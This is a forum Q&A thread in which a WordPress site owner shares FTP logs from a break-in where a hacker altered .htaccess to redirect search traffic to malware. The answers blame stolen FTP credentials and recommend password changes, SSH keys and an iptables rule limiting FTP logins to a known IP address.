.htaccess file hacked, how to prevent this in future? [closed]
The hacker added a code in .htaccess file to redirect all search engine traffic to a malware website. I am now investigating this incident and trying to find out security loop holes. My situation is almost similar to this person's - .htaccess being hacked repeatedly
Here's a sample of intrustion attempt from FTP logs -
Aug 6 02:43:31 sg2nlftpg002 [30887]: ([email protected]) [INFO] FTPUSER is now logged in
Aug 6 09:43:33 sg2nlftpg002 [30887]: ([email protected]) [NOTICE] /home/content/81/7838581/html//.htaccess downloaded (846 bytes, 106.37KB/sec)
Aug 6 09:43:35 sg2nlftpg002 [30887]: ([email protected]) [NOTICE] /home/content/81/7838581/html//.htaccess uploaded (1435 bytes, 3.32KB/sec)
Aug 6 09:43:35 sg2nlftpg002 [30887]: ([email protected]) [INFO] Logout.
This is significantly different from my regular login attemps -
Aug 7 10:57:53 sg2nlftpg002 [11713]: session opened for local user FTPUSER from [my.ip.address]
Aug 7 10:58:28 sg2nlftpg002 [11713]: [FTPUSER] close "/home/content/81/7838581/html/.htaccess" bytes read 1435 written 0
Aug 7 11:14:29 sg2nlftpg002 [11713]: [FTPUSER] close "/home/content/81/7838581/html/.htaccess" bytes read 0 written 846
Aug 7 11:14:55 sg2nlftpg002 [11713]: [FTPUSER] close "/home/content/81/7838581/html/.htaccess" bytes read 846 written 0
Aug 7 12:08:03 sg2nlftpg002 [11713]: session closed for local user FTPUSER from [my.ip.address]
I have gone through HTTP traffic logs but couldn't find anything suspicious over there.
Other information that might be useful:
- I am on a shared host and the website runs on WordPress, BuddyPress and other popular plugins.
- To my knowledge all software under my control uses latest versions and is updated regularly.
- I use strong passwords and update them regularly. Only access website with SFTP and SSH using PUTTY.
- My local machine is free from viruses.
My question is how to prevent such attacks in future?
UPDATE
- Please see report from Google - http://www.google.com/safebrowsing/diagnostic?site=ask-oracle.com
- Another report related to network I am hosted on - http://www.google.com/safebrowsing/diagnostic?site=AS:26496
If they logged in over FTP, then your user account password is compromised and they're just FTPing up the modified file. Audit everywhere that's using your account password for password-collecting malware, then change the password to something secure. Also consider using a passwordless method of authentication (such as SSH public keys), but if your development machine is chock full of malware, it can just steal the key instead.
As already mentioned the chances are that your FTP details have been compromised (normally from an infected Windows desktop PC somewhere I've found).
I've tested this in the past by purposely logging in with the wrong password from a suspected PC, only to see someone else try and login with the same wrong password 15 minutes later from a foreign IP address. Obviously the infected PC was sniffing the password and transmitting it back to the mother ship.
The most pratical thing to do is restrict where people can login to FTP from on your firewall. Password complexity or encryption will probably do you no good in this case, as the password is being stolen at source, and not being guessed or intercepted down the line.
In iptables something like this would work:
iptables -I INPUT -p tcp --dport 21 -s ! X.X.X.X -j DROP
(where X.X.X.X is the IP of your office/home where you connect from).